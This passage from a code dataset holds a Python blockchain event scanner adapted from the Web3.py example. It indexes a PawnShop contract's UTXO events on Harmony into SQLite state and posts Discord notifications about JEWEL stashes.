NotImplementedError\n","repo_name":"danielgatis/rembg","sub_path":"rembg/sessions/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":12170,"dataset":"github-code","pt":"72"} +{"seq_id":"33783927020","text":"# Code is modified from version provided at https://web3py.readthedocs.io/en/latest/examples.html#example-code\n\n\"\"\"A stateful event scanner for Ethereum-based blockchains using Web3.py.\n\nWith the stateful mechanism, you can do one batch scan or incremental scans,\nwhere events are added wherever the scanner left off.\n\"\"\"\n\nimport os\nimport sched\nfrom eth_typing import BlockNumber\nfrom web3.providers.rpc import HTTPProvider\nimport json\nimport datetime\nimport time\nimport logging\nfrom abc import ABC, abstractmethod\nfrom typing import Tuple, Optional, Callable, List, Iterable\nfrom sqlitedict import SqliteDict\n\nfrom web3 import Web3\nfrom web3.contract import Contract\nfrom web3.datastructures import AttributeDict\nfrom web3.exceptions import BlockNotFound\nfrom eth_abi.codec import ABICodec\n\n# Currently this method is not exposed over official web3 API,\n# but we need it to construct eth_getLogs parameters\nfrom web3._utils.filters import construct_event_filter_params\nfrom web3._utils.events import get_event_data\nfrom dotenv import load_dotenv, find_dotenv\n\nfrom discord_webhook import DiscordWebhook\n\nload_dotenv(find_dotenv())\n\nlogger = logging.getLogger(__name__)\nFIRST_BLOCK_TO_SCAN = 21800000\nRUN_EVERY_X_SECONDS = 4\n\nIS_DEV = \"PRODUCTION\" not in os.environ or os.environ[\"PRODUCTION\"] != \"true\"\n\nSCRIPT_DIR = os.path.dirname(__file__) # <-- absolute dir the script is in\nDEPLOYMENT_REL_PATH = (\n \"../../../ui/deployment.json\" if IS_DEV else \"../../../ui/deployment-prod.json\"\n)\nPAWN_SHOP_REL_PATH = (\n \"../../../build/contracts/PawnShop.json\"\n if IS_DEV\n else \"../../../prod-deployment/contracts/PawnShop.json\"\n)\n\nDISCORD_WEBHOOK_URL = os.environ.get(\"DISCORD_WEBHOOK_URL\")\n\nADDRESSES = json.load(open(os.path.join(SCRIPT_DIR, DEPLOYMENT_REL_PATH)))\n\nCONTRACT_ADDRESS = ADDRESSES[\"PawnShop\"]\nCONTRACT_FILE = json.load(\n open(os.path.join(SCRIPT_DIR, PAWN_SHOP_REL_PATH), \"r\"))\nCONTRACT_ABI = CONTRACT_FILE[\"abi\"]\nFIRST_BLOCK_TO_SCAN = ADDRESSES[\"deploymentBlock\"]\n\nDB_FOLDER_PREFIX = os.path.join(SCRIPT_DIR, \"../../db/jewel\")\n\n\nclass IEventScannerState(ABC):\n \"\"\"Application state that remembers what blocks we have scanned in the case of crash.\"\"\"\n\n @abstractmethod\n def get_last_scanned_block(self) -> int:\n \"\"\"Number of the last block we have scanned on the previous cycle.\n\n :return: 0 if no blocks scanned yet\n \"\"\"\n\n @abstractmethod\n def start_chunk(self, block_number: int):\n \"\"\"Scanner is about to ask data of multiple blocks over JSON-RPC.\n\n Start a database session if needed.\n \"\"\"\n\n @abstractmethod\n def end_chunk(self, block_number: int):\n \"\"\"Scanner finished a number of blocks.\n\n Persistent any data in your state now.\n \"\"\"\n\n @abstractmethod\n def process_event(\n self, block_when: datetime.datetime, event: AttributeDict, latest_block_number: BlockNumber\n ) -> object:\n \"\"\"Process incoming events.\n\n This function takes raw events from Web3, transforms them to your application internal\n format, then saves them in a database or some other state.\n\n :param block_when: When this block was mined\n\n :param event: Symbolic dictionary of the event data\n\n :return: Internal state 
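BaseSession.normalize in the rembg record above converts a PIL image to a unit-scaled array, standardizes each channel with (x - mean)/std, transposes HWC to CHW, and prepends a batch axis for onnxruntime. The array arithmetic alone, in plain numpy — the mean/std triples below are ImageNet-style constants of the kind commonly passed to this method, used here purely as placeholder values:

import numpy as np

# Random pixels standing in for a resized RGB image (HWC layout).
im = np.random.randint(0, 256, size=(320, 320, 3)).astype(np.float64)
mean = np.array([0.485, 0.456, 0.406])  # placeholder constants
std = np.array([0.229, 0.224, 0.225])

ary = im / np.max(im)          # scale into [0, 1] by the image max
norm = (ary - mean) / std      # per-channel standardization
chw = norm.transpose(2, 0, 1)  # HWC -> CHW, as ONNX models expect
batch = np.expand_dims(chw, 0).astype(np.float32)

assert batch.shape == (1, 3, 320, 320)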
structure that is the result of event tranformation.\n \"\"\"\n\n @abstractmethod\n def delete_data(self, since_block: int) -> int:\n \"\"\"Delete any data since this block was scanned.\n\n Purges any potential minor reorg data.\n \"\"\"\n\n\nclass EventScanner:\n \"\"\"Scan blockchain for events and try not to abuse JSON-RPC API too much.\n\n Can be used for real-time scans, as it detects minor chain reorganisation and rescans.\n Unlike the easy web3.contract.Contract, this scanner can scan events from multiple contracts at once.\n For example, you can get all transfers from all tokens in the same scan.\n\n You *should* disable the default `http_retry_request_middleware` on your provider for Web3,\n because it cannot correctly throttle and decrease the `eth_getLogs` block number range.\n \"\"\"\n\n def __init__(\n self,\n web3: Web3,\n contract: Contract,\n state: IEventScannerState,\n events: List,\n filters: {},\n max_chunk_scan_size: int = 10000,\n max_request_retries: int = 30,\n request_retry_seconds: float = 3.0,\n ):\n \"\"\"\n :param contract: Contract\n :param events: List of web3 Event we scan\n :param filters: Filters passed to getLogs\n :param max_chunk_scan_size: JSON-RPC API limit in the number of blocks we query. (Recommendation: 10,000 for mainnet, 500,000 for testnets)\n :param max_request_retries: How many times we try to reattempt a failed JSON-RPC call\n :param request_retry_seconds: Delay between failed requests to let JSON-RPC server to recover\n \"\"\"\n\n self.logger = logger\n self.contract = contract\n self.web3 = web3\n self.state = state\n self.events = events\n self.filters = filters\n\n # Our JSON-RPC throttling parameters\n self.min_scan_chunk_size = 10 # 12 s/block = 120 seconds period\n self.max_scan_chunk_size = max_chunk_scan_size\n self.max_request_retries = max_request_retries\n self.request_retry_seconds = request_retry_seconds\n\n # Factor how fast we increase the chunk size if results are found\n # # (slow down scan after starting to get hits)\n self.chunk_size_decrease = 0.5\n\n # Factor how was we increase chunk size if no results found\n self.chunk_size_increase = 2.0\n\n @property\n def address(self):\n return self.token_address\n\n def get_block_timestamp(self, block_num) -> datetime.datetime:\n \"\"\"Get Ethereum block timestamp\"\"\"\n try:\n block_info = self.web3.eth.getBlock(block_num)\n except BlockNotFound:\n # Block was not mined yet,\n # minor chain reorganisation?\n return None\n last_time = block_info[\"timestamp\"]\n return datetime.datetime.fromtimestamp(last_time, datetime.timezone.utc)\n\n def get_suggested_scan_start_block(self):\n \"\"\"Get where we should start to scan for new token events.\n\n If there are no prior scans, start from block 1.\n Otherwise, start from the last end block minus ten blocks.\n We rescan the last ten scanned blocks in the case there were forks to avoid\n misaccounting due to minor single block works (happens once in a hour in Ethereum).\n These heurestics could be made more robust, but this is for the sake of simple reference implementation.\n \"\"\"\n\n end_block = self.get_last_scanned_block()\n if end_block:\n return max(1, end_block - self.NUM_BLOCKS_RESCAN_FOR_FORKS)\n return 1\n\n def get_suggested_scan_end_block(self):\n \"\"\"Get the last mined block on Ethereum chain we are following.\"\"\"\n\n # Do not scan all the way to the final block, as this\n # block might not be mined yet\n return self.web3.eth.blockNumber\n\n def get_last_scanned_block(self) -> int:\n return 
self.state.get_last_scanned_block()\n\n def delete_potentially_forked_block_data(self, after_block: int):\n \"\"\"Purge old data in the case of blockchain reorganisation.\"\"\"\n self.state.delete_data(after_block)\n\n def scan_chunk(self, start_block, end_block) -> Tuple[int, datetime.datetime, list]:\n \"\"\"Read and process events between to block numbers.\n\n Dynamically decrease the size of the chunk if the case JSON-RPC server pukes out.\n\n :return: tuple(actual end block number, when this block was mined, processed events)\n \"\"\"\n\n block_timestamps = {}\n get_block_timestamp = self.get_block_timestamp\n\n # Cache block timestamps to reduce some RPC overhead\n # Real solution might include smarter models around block\n def get_block_when(block_num):\n if block_num not in block_timestamps:\n block_timestamps[block_num] = get_block_timestamp(block_num)\n return block_timestamps[block_num]\n\n all_processed = []\n\n for event_type in self.events:\n # Callable that takes care of the underlying web3 call\n def _fetch_events(_start_block, _end_block):\n return _fetch_events_for_all_contracts(\n self.web3,\n event_type,\n self.filters,\n from_block=_start_block,\n to_block=_end_block,\n )\n\n # Do `n` retries on `eth_getLogs`,\n # throttle down block range if needed\n end_block, events = _retry_web3_call(\n _fetch_events,\n start_block=start_block,\n end_block=end_block,\n retries=self.max_request_retries,\n delay=self.request_retry_seconds,\n )\n\n for evt in events:\n idx = evt[\n \"logIndex\"\n ] # Integer of the log index position in the block, null when its pending\n\n # We cannot avoid minor chain reorganisations, but\n # at least we must avoid blocks that are not mined yet\n assert idx is not None, \"Somehow tried to scan a pending block\"\n\n block_number = evt[\"blockNumber\"]\n\n tx = {}\n if evt[\"event\"] == \"UTXORedeemed\":\n tx = self.web3.eth.get_transaction(evt[\"transactionHash\"])\n\n # Get UTC time when this event happened (block mined timestamp)\n # from our in-memory cache\n block_when = get_block_when(block_number)\n\n logger.debug(\n \"Processing event %s, block: %d\",\n evt[\"event\"],\n evt[\"blockNumber\"],\n )\n processed = self.state.process_event(\n block_when, evt, tx=tx, latest_block_number=self.web3.eth.blockNumber)\n all_processed.append(processed)\n\n end_block_timestamp = get_block_when(end_block)\n return end_block, end_block_timestamp, all_processed\n\n def estimate_next_chunk_size(self, current_chuck_size: int, event_found_count: int):\n \"\"\"Try to figure out optimal chunk size\n\n Our scanner might need to scan the whole blockchain for all events\n\n * We want to minimize API calls over empty blocks\n\n * We want to make sure that one scan chunk does not try to process too many entries once, as we try to control commit buffer size and potentially asynchronous busy loop\n\n * Do not overload node serving JSON-RPC API by asking data for too many events at a time\n\n Currently Ethereum JSON-API does not have an API to tell when a first event occured in a blockchain\n and our heuristics try to accelerate block fetching (chunk size) until we see the first event.\n\n These heurestics exponentially increase the scan chunk size depending on if we are seeing events or not.\n When any transfers are encountered, we are back to scanning only a few blocks at a time.\n It does not make sense to do a full chain scan starting from block 1, doing one JSON-RPC call per 20 blocks.\n \"\"\"\n\n if event_found_count > 0:\n # When we encounter first events, reset 
the chunk size window\n current_chuck_size = self.min_scan_chunk_size\n else:\n current_chuck_size *= self.chunk_size_increase\n\n current_chuck_size = max(self.min_scan_chunk_size, current_chuck_size)\n current_chuck_size = min(self.max_scan_chunk_size, current_chuck_size)\n return int(current_chuck_size)\n\n def scan(\n self,\n start_block,\n end_block,\n start_chunk_size=20,\n progress_callback=Optional[Callable],\n ) -> Tuple[list, int]:\n \"\"\"Perform a token balances scan.\n\n Assumes all balances in the database are valid before start_block (no forks sneaked in).\n\n :param start_block: The first block included in the scan\n\n :param end_block: The last block included in the scan\n\n :param start_chunk_size: How many blocks we try to fetch over JSON-RPC on the first attempt\n\n :param progress_callback: If this is an UI application, update the progress of the scan\n\n :return: [All processed events, number of chunks used]\n \"\"\"\n\n assert start_block <= end_block\n\n current_block = start_block\n\n # Scan in chunks, commit between\n chunk_size = start_chunk_size\n last_scan_duration = last_logs_found = 0\n total_chunks_scanned = 0\n\n # All processed entries we got on this scan cycle\n all_processed = []\n\n while current_block <= end_block:\n\n self.state.start_chunk(current_block, chunk_size)\n\n # Print some diagnostics to logs to try to fiddle with real world JSON-RPC API performance\n estimated_end_block = current_block + chunk_size\n logger.debug(\n \"Scanning token transfers for blocks: %d - %d, chunk size %d, last chunk scan took %f, last logs found %d\",\n current_block,\n estimated_end_block,\n chunk_size,\n last_scan_duration,\n last_logs_found,\n )\n\n start = time.time()\n actual_end_block, end_block_timestamp, new_entries = self.scan_chunk(\n current_block, estimated_end_block\n )\n\n # Where does our current chunk scan ends - are we out of chain yet?\n current_end = actual_end_block\n\n last_scan_duration = time.time() - start\n all_processed += new_entries\n\n if progress_callback:\n progress_callback(\n start_block,\n end_block,\n current_block,\n end_block_timestamp,\n chunk_size,\n len(new_entries),\n )\n\n # Try to guess how many blocks to fetch over `eth_getLogs` API next time\n chunk_size = self.estimate_next_chunk_size(\n chunk_size, len(new_entries))\n\n # Set where the next chunk starts\n current_block = current_end + 1\n total_chunks_scanned += 1\n self.state.end_chunk(min(current_end, end_block))\n\n return all_processed, total_chunks_scanned\n\n\ndef _retry_web3_call(func, start_block, end_block, retries, delay) -> Tuple[int, list]:\n \"\"\"A custom retry loop to throttle down block range.\n\n If our JSON-RPC server cannot serve all incoming `eth_getLogs` in a single request,\n we retry and throttle down block range for every retry.\n\n For example, Go Ethereum does not indicate what is an acceptable response size.\n It just fails on the server-side with a \"context was cancelled\" warning.\n\n :param func: A callable that triggers Ethereum JSON-RPC, as func(start_block, end_block)\n :param start_block: The initial start block of the block range\n :param end_block: The initial start block of the block range\n :param retries: How many times we retry\n :param delay: Time to sleep between retries\n \"\"\"\n for i in range(retries):\n try:\n return end_block, func(start_block, end_block)\n except Exception as e:\n # Assume this is HTTPConnectionPool(host=\"localhost\", port=8545): Read timed out. (read timeout=10)\n # from Go Ethereum. 
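estimate_next_chunk_size in the scanner record implements a simple congestion-style heuristic: grow the queried block range exponentially while scans come back empty, snap back to the minimum window as soon as events appear, and clamp to [min, max]. Isolated from the class, with illustrative bounds:

def next_chunk_size(current, events_found, lo=10, hi=10_000, grow=2.0):
    # Reset to the small window when events appear; otherwise grow the range.
    size = lo if events_found > 0 else current * grow
    return int(min(hi, max(lo, size)))

size = 20
for found in (0, 0, 0, 5, 0):
    size = next_chunk_size(size, found)
    print(size)  # 40, 80, 160, 10, 20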
This translates to the error \"context was cancelled\" on the server side:\n # https://github.com/ethereum/go-ethereum/issues/20426\n if i < retries - 1:\n # Give some more verbose info than the default middleware\n logger.warning(\n \"Retrying events for block range %d - %d (%d) failed with %s, retrying in %s seconds\",\n start_block,\n end_block,\n end_block - start_block,\n e,\n delay,\n )\n # Decrease the `eth_getBlocks` range\n end_block = start_block + ((end_block - start_block) // 2)\n # Let the JSON-RPC to recover e.g. from restart\n time.sleep(delay)\n continue\n else:\n logger.warning(\"Out of retries\")\n raise\n\n\ndef _fetch_events_for_all_contracts(\n web3, event, argument_filters: dict, from_block: int, to_block: int\n) -> Iterable:\n \"\"\"Get events using eth_getLogs API.\n\n This method is detached from any contract instance.\n\n This is a stateless method, as opposed to createFilter.\n It can be safely called against nodes which do not provide `eth_newFilter` API, like Infura.\n \"\"\"\n\n if from_block is None:\n raise TypeError(\n \"Missing mandatory keyword argument to getLogs: fromBlock\")\n\n # Currently no way to poke this using a public Web3.py API.\n # This will return raw underlying ABI JSON object for the event\n abi = event._get_event_abi()\n\n # Depending on the Solidity version used to compile\n # the contract that uses the ABI,\n # it might have Solidity ABI encoding v1 or v2.\n # We just assume the default that you set on Web3 object here.\n # More information here https://eth-abi.readthedocs.io/en/latest/index.html\n codec: ABICodec = web3.codec\n\n # Here we need to poke a bit into Web3 internals, as this\n # functionality is not exposed by default.\n # Construct JSON-RPC raw filter presentation based on human readable Python descriptions\n # Namely, convert event names to their keccak signatures\n # More information here:\n # https://github.com/ethereum/web3.py/blob/e176ce0793dafdd0573acc8d4b76425b6eb604ca/web3/_utils/filters.py#L71\n data_filter_set, event_filter_params = construct_event_filter_params(\n abi,\n codec,\n address=argument_filters.get(\"address\"),\n argument_filters=argument_filters,\n fromBlock=from_block,\n toBlock=to_block,\n )\n\n logger.debug(\n \"Querying eth_getLogs with the following parameters: %s\", event_filter_params\n )\n\n # Call JSON-RPC API on your Ethereum node.\n # get_logs() returns raw AttributedDict entries\n logs = web3.eth.get_logs(event_filter_params)\n\n # Convert raw binary data to Python proxy objects as described by ABI\n all_events = []\n for log in logs:\n # Convert raw JSON-RPC log result to human readable event by using ABI data\n # More information how processLog works here\n # https://github.com/ethereum/web3.py/blob/fbaf1ad11b0c7fac09ba34baff2c256cffe0a148/web3/_utils/events.py#L200\n evt = get_event_data(codec, abi, log)\n # Note: This was originally yield,\n # but deferring the timeout exception caused the throttle logic not to work\n all_events.append(evt)\n return all_events\n\n\nclass SqliteDictState(IEventScannerState):\n \"\"\"Store the state of scanned blocks and all events.\n\n All state is a dict backed by sqlite, by using sqlitedict.\n \"\"\"\n\n def __init__(self):\n pass\n\n def reset(self):\n \"\"\"Create initial state of nothing scanned.\"\"\"\n self.state_meta.clear()\n self.state_utxo.clear()\n self.state_utxos_by_user.clear()\n self.state_utxo_redemptions.clear()\n self.state_meta[\"last_scanned_block\"] = FIRST_BLOCK_TO_SCAN\n self.state_meta[\"last_utxo_redemption_index\"] = 0\n 
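_retry_web3_call above shrinks the queried block range by half on every failure before sleeping and retrying, so an overloaded eth_getLogs endpoint eventually receives a range it can serve. The control flow, stripped of the web3 specifics — fetch here is any callable that raises when the range is too large:

import time

def retry_halving(fetch, start, end, retries=5, delay=0.0):
    for attempt in range(retries):
        try:
            return end, fetch(start, end)
        except Exception:
            if attempt == retries - 1:
                raise
            end = start + (end - start) // 2  # halve the range and retry
            time.sleep(delay)

# Toy fetch that only tolerates ranges of at most 100 blocks.
def fetch(s, e):
    if e - s > 100:
        raise RuntimeError("range too large")
    return list(range(s, e))

print(retry_halving(fetch, 0, 1000))  # succeeds once the range shrinks enough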
self.commit()\n\n def restore(self):\n self.state_meta = SqliteDict(\n filename=os.path.join(DB_FOLDER_PREFIX, \"./state_meta.sqlite\"),\n autocommit=False,\n flag=\"c\",\n journal_mode=\"WAL\",\n )\n self.state_utxo = SqliteDict(\n filename=os.path.join(DB_FOLDER_PREFIX, \"./state_utxo.sqlite\"),\n autocommit=False,\n flag=\"c\",\n journal_mode=\"WAL\",\n )\n self.state_utxo_seen_events = SqliteDict(\n filename=os.path.join(\n DB_FOLDER_PREFIX, \"./state_utxo_seen_events.sqlite\"),\n autocommit=False,\n flag=\"c\",\n journal_mode=\"WAL\",\n )\n self.state_utxos_by_user = SqliteDict(\n filename=os.path.join(\n DB_FOLDER_PREFIX, \"./state_utxos_by_user.sqlite\"),\n autocommit=False,\n flag=\"c\",\n journal_mode=\"WAL\",\n )\n self.state_utxo_redemptions = SqliteDict(\n filename=os.path.join(\n DB_FOLDER_PREFIX, \"./state_utxo_redemptions.sqlite\"),\n autocommit=False,\n flag=\"c\",\n journal_mode=\"WAL\",\n )\n self.state_aggregates = SqliteDict(\n filename=os.path.join(\n DB_FOLDER_PREFIX, \"./state_aggregates.sqlite\"),\n autocommit=False,\n flag=\"c\",\n journal_mode=\"WAL\",\n )\n\n def save(self):\n logger.debug(\"...CLOSING STATE...\")\n self.state_meta.close()\n self.state_utxo.close()\n self.state_utxo_seen_events.close()\n self.state_utxos_by_user.close()\n self.state_utxo_redemptions.close()\n self.state_aggregates.close()\n logger.debug(\"...STATE CLOSED...\")\n\n def commit(self):\n logger.debug(\"...COMITTING STATE...\")\n self.state_meta.commit(blocking=True)\n self.state_utxo.commit(blocking=True)\n self.state_utxo_seen_events.commit(blocking=True)\n self.state_utxos_by_user.commit(blocking=True)\n self.state_utxo_redemptions.commit(blocking=True)\n self.state_aggregates.commit(blocking=True)\n logger.debug(\"...STATE COMMITED...\")\n\n #\n # EventScannerState methods implemented below\n #\n\n def get_last_scanned_block(self):\n \"\"\"The number of the last block we have stored.\"\"\"\n return (\n self.state_meta[\"last_scanned_block\"]\n if \"last_scanned_block\" in self.state_meta\n else FIRST_BLOCK_TO_SCAN\n )\n\n def delete_data(self, since_block):\n \"\"\"Remove potentially reorganised blocks from the scan data.\"\"\"\n pass\n\n def start_chunk(self, block_number, chunk_size):\n \"\"\"Save at the end of each chunk, so we can resume in the case of a crash or CTRL+C\"\"\"\n self.commit()\n\n def end_chunk(self, block_number):\n \"\"\"Save at the end of each chunk, so we can resume in the case of a crash or CTRL+C\"\"\"\n # Next time the scanner is started we will resume from this block\n self.state_meta[\"last_scanned_block\"] = block_number\n self.commit()\n\n def process_event(\n self, block_when: datetime.datetime, event: AttributeDict, tx: AttributeDict, latest_block_number: BlockNumber\n ) -> str:\n \"\"\"Record a ERC-20 transfer in our database.\"\"\"\n # Events are keyed by their transaction hash and log index\n # One transaction may contain multiple events\n # and each one of those gets their own log index\n\n # event_name = event.event # \"Transfer\"\n log_index = event.logIndex # Log index within the block\n # transaction_index = event.transactionIndex # Transaction index within the block\n txhash = event.transactionHash.hex() # Transaction hash\n block_number = event.blockNumber\n event_type = event[\"event\"]\n\n utxoObject = None\n\n # Convert ERC-20 Transfer event to our internal format\n args = event[\"args\"]\n\n def is_event_seen(db):\n key = f\"{block_number}-{txhash}-{log_index}-{event_type}\"\n return key in db and db[key] is True\n\n def 
mark_event_as_seen(db):\n key = f\"{block_number}-{txhash}-{log_index}-{event_type}\"\n db[key] = True\n\n # TODO: refactor all this so it\"s not just one big function\n if event_type == \"UTXOCreated\":\n if not is_event_seen(self.state_utxo_seen_events):\n utxoObject = {\n \"utxoAddress\": args[\"utxoAddress\"].lower(),\n \"minter\": args[\"minter\"].lower(),\n }\n\n if (\n utxoObject[\"minter\"] in self.state_utxos_by_user\n and self.state_utxos_by_user[utxoObject[\"minter\"]] is not None\n ):\n list_for_minter = self.state_utxos_by_user[utxoObject[\"minter\"]]\n if (\n utxoObject[\"utxoAddress\"]\n not in self.state_utxos_by_user[utxoObject[\"minter\"]]\n ):\n list_for_minter.append(utxoObject[\"utxoAddress\"])\n self.state_utxos_by_user[utxoObject[\"minter\"]\n ] = list_for_minter\n else:\n self.state_utxos_by_user[utxoObject[\"minter\"]] = [\n utxoObject[\"utxoAddress\"]\n ]\n mark_event_as_seen(self.state_utxo_seen_events)\n else:\n logger.warn(\n f\"Already seen UTXOCreated event {block_number}-{txhash}-{log_index}\"\n )\n elif event_type == \"UTXOValue\":\n if not is_event_seen(self.state_utxo_seen_events):\n utxoObject = {\n \"utxoAddress\": args[\"UTXOAddress\"].lower(),\n \"newVal\": str(args[\"newVal\"]),\n \"blockNumber\": block_number,\n \"timestamp\": block_when.timestamp() * 1000, # milliseconds\n }\n if int(args[\"newVal\"]) > 0 and block_number > (latest_block_number - 100):\n notify_new_stash(args[\"newVal\"])\n mark_event_as_seen(self.state_utxo_seen_events)\n else:\n logger.warn(\n f\"Already seen UTXOValue event {block_number}-{txhash}-{log_index}\"\n )\n elif event_type == \"UTXORedeemed\":\n if not is_event_seen(self.state_utxo_redemptions):\n last_utxo_redemption_index = (\n self.state_meta[\"last_utxo_redemption_index\"]\n if \"last_utxo_redemption_index\" in self.state_meta\n else \"0\"\n ) or \"0\"\n next_utxo_redemption_index = int(\n last_utxo_redemption_index) + 1\n _redeem = args[\"redeemooor\"].lower()\n if args[\"redeemooor\"].lower() == ADDRESSES[\"PawnShopRouter\"].lower():\n _redeem = tx[\"from\"].lower()\n self.state_utxo_redemptions[next_utxo_redemption_index] = {\n \"tx\": txhash,\n \"utxoAddress\": args[\"UTXOAddress\"].lower(),\n \"redeemedBy\": str(_redeem),\n \"amount\": str(args[\"redeemedAmount\"]),\n \"fee\": str(args[\"feePaid\"]),\n \"amountInJewel\": str(args[\"feeRatio\"]),\n \"totalCost\": str(args[\"totalCost\"]),\n \"blockNumber\": block_number,\n \"timestamp\": block_when.timestamp() * 1000, # milliseconds\n }\n if block_number > (latest_block_number - 100):\n notify_redeemed_stash(int(args[\"redeemedAmount\"]))\n mark_event_as_seen(self.state_utxo_redemptions)\n self.state_meta[\n \"last_utxo_redemption_index\"\n ] = next_utxo_redemption_index\n else:\n logger.warn(\n f\"Already seen UTXORedeemed event {block_number}-{txhash}-{log_index}\"\n )\n\n if utxoObject is None:\n # no update made to object\n pass\n elif (\n utxoObject[\"utxoAddress\"] in self.state_utxo\n and self.state_utxo[utxoObject[\"utxoAddress\"]] is not None\n ):\n current_object = self.state_utxo[utxoObject[\"utxoAddress\"]]\n current_object.update(utxoObject)\n self.state_utxo[utxoObject[\"utxoAddress\"]] = current_object\n else:\n self.state_utxo[utxoObject[\"utxoAddress\"]] = utxoObject\n\n # AGGREGATES\n if not is_event_seen(self.state_aggregates):\n # large numbers are always stored as string because JSON cannot handle massive uint256\n def get_agg(key):\n return int(\n (\n self.state_aggregates[key]\n if key in self.state_aggregates\n else \"0\"\n )\n or 
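process_event above makes event handling idempotent across rescans by keying every event as block-txhash-logindex-eventtype in a persistent "seen" table; that is what lets the scanner safely re-read the chain_reorg_safety_blocks window on each pass without double-counting. The pattern, with an ordinary dict standing in for the SqliteDict:

seen = {}  # SqliteDict in the original; a plain dict shows the idea

def process_once(block, txhash, log_index, event_type, handler):
    key = f"{block}-{txhash}-{log_index}-{event_type}"
    if seen.get(key):
        return False      # already handled on a previous (re)scan
    handler()
    seen[key] = True      # mark only after the handler succeeded
    return True

calls = []
process_once(7, "0xabc", 0, "UTXOCreated", lambda: calls.append(1))
process_once(7, "0xabc", 0, "UTXOCreated", lambda: calls.append(1))
print(len(calls))  # 1 -- the rescan is a no-op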
\"0\"\n )\n\n def get_agg_in_cur_bucket(key):\n bucket_key = block_when.replace(\n minute=0, second=0, microsecond=0\n ).isoformat(timespec=\"seconds\")\n key_ = f\"{key}-{bucket_key}\"\n return int(\n (\n self.state_aggregates[key_]\n if key_ in self.state_aggregates\n else \"0\"\n )\n or \"0\"\n )\n\n def update_agg(key, value, bucketValue=None):\n self.state_aggregates[key] = str(value)\n bucket_time = block_when.replace(\n minute=0, second=0, microsecond=0\n ).isoformat(timespec=\"seconds\")\n self.state_aggregates[f\"{key}-{bucket_time}\"] = str(\n bucketValue if bucketValue is not None else value\n )\n\n current_total_stashes = get_agg(\"totalStashes\")\n current_locked_jewel_in_protocol = get_agg(\"lockedJewelTotal\")\n current_total_fees_paid = get_agg(\"totalFeesPaid\")\n current_total_fees_paid_in_jewel = get_agg(\"totalFeesPaidInJewel\")\n current_total_redemptions_volume = get_agg(\n \"totalRedemptionsVolume\")\n\n if event_type == \"UTXOCreated\":\n update_agg(\"totalStashes\", current_total_stashes + 1)\n elif event_type == \"MintedFromUTXO\":\n update_agg(\n \"lockedJewelTotal\",\n current_locked_jewel_in_protocol +\n int(args[\"mintedAmount\"]),\n )\n elif event_type == \"UTXORedeemed\":\n update_agg(\n \"lockedJewelTotal\",\n current_locked_jewel_in_protocol -\n int(args[\"redeemedAmount\"]),\n )\n update_agg(\n \"totalFeesPaid\", current_total_fees_paid +\n int(args[\"feePaid\"])\n )\n update_agg(\n \"totalFeesPaidInJewel\",\n current_total_fees_paid_in_jewel + int(args[\"feeRatio\"]),\n )\n update_agg(\n \"totalRedemptionsVolume\",\n current_total_redemptions_volume +\n int(args[\"redeemedAmount\"]),\n )\n\n mark_event_as_seen(self.state_aggregates)\n\n self.commit()\n\n # Return a pointer that allows us to look up this event later if needed\n return f\"{block_number}-{txhash}-{log_index}\"\n\n\nscheduler = sched.scheduler(time.time, time.sleep)\n\n\ndef run(sc):\n api_url = (\n os.environ[\"HARMONY_RPC_URL\"]\n if \"HARMONY_RPC_URL\" in os.environ\n else \"http://127.0.0.1:8545\"\n )\n\n # Enable logs to the stdout.\n # DEBUG is very verbose level\n logging.basicConfig(level=logging.INFO)\n\n provider = HTTPProvider(api_url)\n\n # Remove the default JSON-RPC retry middleware\n # as it correctly cannot handle eth_getLogs block range\n # throttle down.\n provider.middlewares.clear()\n\n web3 = Web3(provider)\n\n # Prepare stub ERC-20 contract object\n abi = CONTRACT_ABI\n CONTRACT = web3.eth.contract(abi=abi)\n\n # Restore/create our persistent state\n state = SqliteDictState()\n state.restore()\n\n # chain_id: int, web3: Web3, abi: dict, state: EventScannerState, events: List, filters: {}, max_chunk_scan_size: int=10000\n scanner = EventScanner(\n web3=web3,\n contract=CONTRACT,\n state=state,\n events=[\n CONTRACT.events.UTXOValue,\n CONTRACT.events.UTXOCreated,\n CONTRACT.events.UTXORedeemed,\n CONTRACT.events.MintedFromUTXO,\n ],\n filters={\"address\": CONTRACT_ADDRESS},\n # How many maximum blocks at the time we request from JSON-RPC\n # and we are unlikely to exceed the response size limit of the JSON-RPC server\n max_chunk_scan_size=1000,\n )\n\n # Assume we might have scanned the blocks all the way to the last Ethereum block\n # that mined a few seconds before the previous scan run ended.\n # Because there might have been a minor Etherueum chain reorganisations\n # since the last scan ended, we need to discard\n # the last few blocks from the previous scan results.\n chain_reorg_safety_blocks = 20\n scanner.delete_potentially_forked_block_data(\n 
state.get_last_scanned_block() - chain_reorg_safety_blocks\n )\n\n # Scan from [last block scanned] - [latest ethereum block]\n # Note that our chain reorg safety blocks cannot go negative\n start_block = max(state.get_last_scanned_block() -\n chain_reorg_safety_blocks, 0)\n end_block = scanner.get_suggested_scan_end_block()\n blocks_to_scan = end_block - start_block\n\n logger.info(f\"Scanning events from blocks {start_block} - {end_block}\")\n\n # Render a progress bar in the console\n start = time.time()\n\n def _update_progress(\n start, end, current, current_block_timestamp, chunk_size, events_count\n ):\n if current_block_timestamp:\n formatted_time = current_block_timestamp.strftime(\"%d-%m-%Y\")\n else:\n formatted_time = \"no block time available\"\n logger.info(\n f\"Current block: {current} ({formatted_time}), blocks in a scan batch: {chunk_size}, events processed in a batch {events_count}\"\n )\n\n # Run the scan\n result, total_chunks_scanned = scanner.scan(\n start_block, end_block, progress_callback=_update_progress\n )\n\n state.save()\n duration = time.time() - start\n logger.info(\n f\"Scanned total {len(result)} events, in {duration} seconds, total {total_chunks_scanned} chunk scans performed\"\n )\n scheduler.enter(RUN_EVERY_X_SECONDS, 1, run, (sc,))\n\n\nscheduler.enter(RUN_EVERY_X_SECONDS, 1, run, (scheduler,))\n\n\ndef notify_new_stash(value):\n webhook = DiscordWebhook(\n url=DISCORD_WEBHOOK_URL,\n content=f\"New JEWEL stash has been minted! {value/1e18:.3f} locked JEWEL can be claimed.\",\n )\n response = webhook.execute()\n\n\ndef notify_redeemed_stash(redeemed_value):\n webhook = DiscordWebhook(\n url=DISCORD_WEBHOOK_URL,\n content=f\"A JEWEL stash has just been redeemed for {redeemed_value/1e18:.3f}. Need to be quicker next time!\",\n )\n response = 